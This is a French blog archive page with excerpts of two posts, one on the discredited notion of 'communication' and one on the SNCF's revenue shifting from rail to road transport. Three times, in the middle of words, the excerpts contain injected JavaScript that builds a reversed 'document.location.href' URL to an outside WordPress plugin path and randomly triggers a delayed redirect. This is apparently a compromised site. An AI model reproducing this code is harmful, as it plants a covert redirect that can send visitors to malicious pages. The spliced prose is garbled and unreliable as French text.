métier

La communication pervertie

La communication, comme la grâce, est nécessaire mais pas suffisante. C’est pourquoi ce ne peut être durablement un métier, au mieux une maîtrise technique qui n’est rien sans le désir profond de connaître, de comprendre et de participer. On savait le terme « communication » suspect, la notion galvaudée, la profession discréditée. Voilà Marine Le Pen qui plante l’estoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocade, en accusant le gouvernement de « sombrer dans l’apathie et la communication ». C’est dire, l’affaire est pliée. Nécessaire,…

Read More

SNCF ou SNTF?

Dans son blog du 9 septembre 2010, l’éditoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torialiste Philippe Escande des Echos constate que le rail n’est plus le premier métier de la SNCF et souligne avec Renaud Honoré que la SNCF devrait s’appeler SNTF, « Société nationale des Transports ». En effet, la SNCF gagne aujourd’hui plus d’argent avec ses autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobus (Keolis) et ses camions ( Geodis) qu’avec ses activités ferroviaires, qui ne représentent plus que 45% de ses revenus.…

Read More